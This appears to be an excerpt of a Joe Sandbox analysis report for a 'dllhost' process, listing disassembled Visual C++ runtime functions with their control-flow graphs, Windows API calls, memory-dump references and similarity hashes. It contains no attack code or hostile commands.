                                                                                  control_flow_graph 254 401460-40148f 255 401491-4014a7 GetStringTypeW 254->255 256 4014cf-4014d2 254->256 257 4014a9-4014ab 255->257 258 4014ad-4014c1 GetStringTypeA 255->258 259 4014d4-4014d9 256->259 260 4014f8-4014fb 256->260 263 4014ca 257->263 262 401595 258->262 264 4014c7-4014c9 258->264 265 4014e0-4014f3 GetStringTypeA 259->265 266 4014db 259->266 261 401501-401504 260->261 260->262 267 401506-40150b 261->267 268 40150e-401530 MultiByteToWideChar 261->268 269 401597-4015a8 262->269 263->256 264->263 265->269 266->265 267->268 268->262 270 401532-40156a call 401df4 call 4049ec 268->270 270->262 276 40156c-401583 MultiByteToWideChar 270->276 276->262 277 401585-401593 GetStringTypeW 276->277 277->269
                                                                                  APIs
                                                                                  • GetStringTypeW.KERNEL32(00000001,0040937C,00000001,?,74DEE860,0046302C,?,?,00405455,?,?,?,00000000,00000001), ref: 0040149F
                                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,004091E4,00000001,?,?,00405455,?,?,?,00000000,00000001), ref: 004014B9
                                                                                  • GetStringTypeA.KERNEL32(?,?,?,?,UT@,74DEE860,0046302C,?,?,00405455,?,?,?,00000000,00000001), ref: 004014ED
                                                                                  • MultiByteToWideChar.KERNEL32(?,,0F,?,?,00000000,00000000,74DEE860,0046302C,?,?,00405455,?,?,?,00000000,00000001), ref: 00401525
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00405455,?), ref: 0040157B
                                                                                  • GetStringTypeW.KERNEL32(?,?,00000000,UT@,?,?,?,?,?,?,00405455,?), ref: 0040158D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: StringType$ByteCharMultiWide
                                                                                  • String ID: ,0F$UT@
                                                                                  • API String ID: 3852931651-2878614304
                                                                                  • Opcode ID: 07cae56b14df64ca1d25d27828df8eb6213f4e0473117297d13a6dd39bd2dd08
                                                                                  • Instruction ID: 2c3f253558ef933acebc22a305ccf09ca6fc9644d113af0b9f2b2587c509ad0e
                                                                                  • Opcode Fuzzy Hash: 07cae56b14df64ca1d25d27828df8eb6213f4e0473117297d13a6dd39bd2dd08
                                                                                  • Instruction Fuzzy Hash: B0415CB2600259BFCF218F94DC85EEF7F69EB08750F104536F916A62A1D3389D508BA9
                                                                                  Function 00401F48 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 291 401f48-401f56 292 401f5b-401f5d 291->292 293 401f6a-401f76 292->293 294 401f5f-401f68 292->294 295 402098-40209a 293->295 296 401f7c-401f84 293->296 294->292 294->293 297 402072-402092 call 404f78 GetStdHandle WriteFile 296->297 298 401f8a-401f8c 296->298 297->295 299 401f9b-401fa1 298->299 300 401f8e-401f95 298->300 299->295 302 401fa7-401fbd GetModuleFileNameA 299->302 300->297 300->299 304 401fd2-401fea call 404f78 302->304 305 401fbf-401fd1 call 401698 302->305 310 402015-402070 call 401698 call 4016a8 * 3 call 402310 304->310 311 401fec-402012 call 404f78 call 405064 304->311 305->304 310->295 311->310
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00401FB5
                                                                                  • GetStdHandle.KERNEL32(000000F4,00409484,00000000,00000000,00000000,?), ref: 0040208B
                                                                                  • WriteFile.KERNEL32(00000000), ref: 00402092
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                  • API String ID: 3784150691-4022980321
                                                                                  • Opcode ID: 31c48dcd78de2902a7102ac0e468da7538395af523ba9bf0bf5ae6eab85546e0
                                                                                  • Instruction ID: 353bd358fc87e6ecb88456980510914f7608dab287bc0301624dfb5383aab7a2
                                                                                  • Opcode Fuzzy Hash: 31c48dcd78de2902a7102ac0e468da7538395af523ba9bf0bf5ae6eab85546e0
                                                                                  • Instruction Fuzzy Hash: 4531C172A00218AFDF20E660CD49FAA376CEB46301F54087BFA45F71D2D7789A45CA5A
                                                                                  Function 004021DC Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 326 4021dc-4021f5 327 4021f7-4021fd GetEnvironmentStringsW 326->327 328 40222a-40222d 326->328 329 40220b-402215 GetEnvironmentStrings 327->329 330 4021ff-402209 327->330 331 402233-402235 328->331 332 4022b4-4022b7 328->332 333 402305 329->333 334 40221b-402225 329->334 330->331 336 402243-402248 331->336 337 402237-40223d GetEnvironmentStringsW 331->337 332->333 335 4022b9-4022bb 332->335 338 402307-40230d 333->338 334->335 339 4022c9-4022cd 335->339 340 4022bd-4022c7 GetEnvironmentStrings 335->340 341 402258-402275 WideCharToMultiByte 336->341 342 40224a-40224f 336->342 337->333 337->336 345 4022d9-4022e9 call 4049d8 339->345 346 4022cf-4022d2 339->346 340->333 340->339 343 402277-402284 call 4049d8 341->343 344 4022a9-4022b2 FreeEnvironmentStringsW 341->344 342->342 347 402251-402256 342->347 343->344 355 402286-402295 WideCharToMultiByte 343->355 344->338 353 4022eb-4022ed 345->353 354 4022ef-4022f7 call 4019b8 345->354 346->346 350 4022d4-4022d7 346->350 347->341 347->342 350->345 350->346 356 4022fa-402303 FreeEnvironmentStringsA 353->356 354->356 358 4022a5 355->358 359 402297-4022a1 call 4015ac 355->359 356->338 358->344 359->358
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401096), ref: 004021F7
                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401096), ref: 0040220B
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401096), ref: 00402237
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401096), ref: 0040226F
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401096), ref: 00402291
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00401096), ref: 004022AA
                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401096), ref: 004022BD
                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004022FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1823725401-0
                                                                                  • Opcode ID: 1b02f493154be9ba70f699b67ef859cde770e8d656882e3c1aa63c91b7e72620
                                                                                  • Instruction ID: 01933e7cb5bb143a36eec717e07290e85ced864bd21ce10d6bfd835e533edd1a
                                                                                  • Opcode Fuzzy Hash: 1b02f493154be9ba70f699b67ef859cde770e8d656882e3c1aa63c91b7e72620
                                                                                  • Instruction Fuzzy Hash: 7D3104B25042256FE7207BB49ECC83B769CE68930471505BFF952F32D1E6B98C8186BD
                                                                                  Function 00403BD8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 150COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00403C36
                                                                                  • GetFileType.KERNEL32(?,?,00000000), ref: 00403CE1
                                                                                  • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00403D44
                                                                                  • GetFileType.KERNEL32(00000000,?,00000000), ref: 00403D52
                                                                                  • SetHandleCount.KERNEL32 ref: 00403D89
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                                  • String ID: @0F
                                                                                  • API String ID: 1710529072-3475146372
                                                                                  • Opcode ID: c4909c97a1fd72e1e228d0010ea8ace08c4a8341c2f9480f19021213b8196bd7
                                                                                  • Instruction ID: 28a553a9637121220ee7247c65834bb0b9772ccf18777b3abf87fb485a1a5954
                                                                                  • Opcode Fuzzy Hash: c4909c97a1fd72e1e228d0010ea8ace08c4a8341c2f9480f19021213b8196bd7
                                                                                  • Instruction Fuzzy Hash: 0C5148719042418BD720CF28C8847263FA8AF1272AF28467EC592FB3E1E738CE45C759
                                                                                  Function 004023BC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetVersionExA.KERNEL32 ref: 004023DB
                                                                                  • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00402410
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402470
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                  • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                  • API String ID: 1385375860-4131005785
                                                                                  • Opcode ID: 82d2434ca4891ad27d0855a263d5e3d4dffc660e015b2eb8e909bd98dd4d4f92
                                                                                  • Instruction ID: d88cb298004c66bfd347c1fe4df28c0533db6c8754958dd86b1fd33aef8941e5
                                                                                  • Opcode Fuzzy Hash: 82d2434ca4891ad27d0855a263d5e3d4dffc660e015b2eb8e909bd98dd4d4f92
                                                                                  • Instruction Fuzzy Hash: D8314A719012486DEF3196709E997DF37689B02304F2440FBD549F62D2D6BD8E89CB19
                                                                                  Function 00403AE0 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000103,7FFFFFFF,0040378D,004053B3,00000000,?,?,00000000,00000001), ref: 00403AE2
                                                                                  • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00403AF0
                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 00403B3C
                                                                                    • Part of subcall function 00401878: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00403B05,00000001,00000074,?,?,00000000,00000001), ref: 0040196E
                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00403B14
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00403B25
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                  • String ID:
                                                                                  • API String ID: 2020098873-0
                                                                                  • Opcode ID: d49466e2b71193a36731df746ec1887938efd12bcb208c3441ac4186523aebc5
                                                                                  • Instruction ID: 97a5c9557e1ae8d9f6599d7a94307f1eaeaa4b81106fa305304cd28b9b093828
                                                                                  • Opcode Fuzzy Hash: d49466e2b71193a36731df746ec1887938efd12bcb208c3441ac4186523aebc5
                                                                                  • Instruction Fuzzy Hash: 2EF06D36A016216BD7312F71BC09A5B3E78AF51B66B10053AF586B62E2CB389D418698
                                                                                  Function 00401350 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401373
                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401389
                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00405455,?,?,?,00000000,00000001), ref: 004013BC
                                                                                  • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401424
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00405455,?), ref: 00401449
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$ByteCharMultiWide
                                                                                  • String ID: UT@
                                                                                  • API String ID: 352835431-1027468425
                                                                                  • Opcode ID: c994583962df0ed7ae7243b69efa640dd53768e2b06385abeedffc49915dc18a
                                                                                  • Instruction ID: d78f3124ed4a51485e43371b09153d829d5b461428cb016d3bcab1a8dfffb7e2
                                                                                  • Opcode Fuzzy Hash: c994583962df0ed7ae7243b69efa640dd53768e2b06385abeedffc49915dc18a
                                                                                  • Instruction Fuzzy Hash: A9112832900249EBDF228F94CD00ADEBBB5FB48350F148166FE11722B0D3368D60DB64
                                                                                  Function 00405404 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(0046302C), ref: 0040542A
                                                                                  • InterlockedDecrement.KERNEL32(0046302C), ref: 0040543F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementIncrement
                                                                                  • String ID: ,0F
                                                                                  • API String ID: 2172605799-2398074048
                                                                                  • Opcode ID: d0039b60ddb3736004e8f66d235de526adf7d0c1eeb433830ddcdd98a6567be0
                                                                                  • Instruction ID: 9f011c1cc064125e4e1f365d8986e9f9c51d6544cad74443aba1903841879af2
                                                                                  • Opcode Fuzzy Hash: d0039b60ddb3736004e8f66d235de526adf7d0c1eeb433830ddcdd98a6567be0
                                                                                  • Instruction Fuzzy Hash: 1DF0A972105A11ABE720AE65A881B8B6794EB80317F25443FF200A51E2C7B89D81CA6E
                                                                                  Function 00407AE4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,Qe@,00000000,Qe@,00000000,00000000,00000000,?,00406551,00000000), ref: 00407B07
                                                                                  • GetLastError.KERNEL32(?,00406551,00000000), ref: 00407B38
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CompletionErrorLastQueuedStatus
                                                                                  • String ID: Qe@$Qe@
                                                                                  • API String ID: 1532515109-880564545
                                                                                  • Opcode ID: 30c82a72444b98b0c31a9aadcc92cde5706fef6031e42e068d93ad7527ca1d74
                                                                                  • Instruction ID: d58a1868424a8a0235f50982a74f1edf5cd213767c1dac622a4f6683b2030a8b
                                                                                  • Opcode Fuzzy Hash: 30c82a72444b98b0c31a9aadcc92cde5706fef6031e42e068d93ad7527ca1d74
                                                                                  • Instruction Fuzzy Hash: D7011DB5504205AFC714CF11D884AA737F8EF08369B10067EA40AD72A1EB74FD81CB99
                                                                                  Function 00402A90 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • HeapAlloc.KERNEL32(00000000,00002020,0045D430,0045D430,?,?,004027D4,00000000,00000010,00000000,00000009,00000009,?,00401DA4,00000010,00000000), ref: 00402AB1
                                                                                  • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,004027D4,00000000,00000010,00000000,00000009,00000009,?,00401DA4,00000010,00000000), ref: 00402AD5
                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,004027D4,00000000,00000010,00000000,00000009,00000009,?,00401DA4,00000010,00000000), ref: 00402AEF
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004027D4,00000000,00000010,00000000,00000009,00000009,?,00401DA4,00000010,00000000,?), ref: 00402BB0
                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,004027D4,00000000,00000010,00000000,00000009,00000009,?,00401DA4,00000010,00000000,?,00000000), ref: 00402BC7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual$FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 714016831-0
                                                                                  • Opcode ID: ff70acb26bc0ce49c42f03cbb2d3d1a5c25977b22c41e8071898cc23789281d8
                                                                                  • Instruction ID: 01ec7a6da4d03d942993ae9d05248687ec6bc59c10bc01f1360c5df886961c2f
                                                                                  • Opcode Fuzzy Hash: ff70acb26bc0ce49c42f03cbb2d3d1a5c25977b22c41e8071898cc23789281d8
                                                                                  • Instruction Fuzzy Hash: 88314470A00701ABD3308F28DD88B62B7F4EB45765F10423AE559A73D2E7B8B884CB4C
                                                                                  Function 00404630 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004046F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: 2326a597c6e5b14eb6ddd5c1f1cdbbf1ee3e972c3f164697542adcc83cbe6658
                                                                                  • Instruction ID: 3548c9f421e37c23a281ec2324253a1f5e2a297354bffb8e0d54b8a68d9c7168
                                                                                  • Opcode Fuzzy Hash: 2326a597c6e5b14eb6ddd5c1f1cdbbf1ee3e972c3f164697542adcc83cbe6658
                                                                                  • Instruction Fuzzy Hash: 925182B1900108EFCB11DF68C984A9D7BB4FFC6350F14857AEA15AB291D778DA40CB59
                                                                                  Function 00404DB0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(?,00000000), ref: 00404DC4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
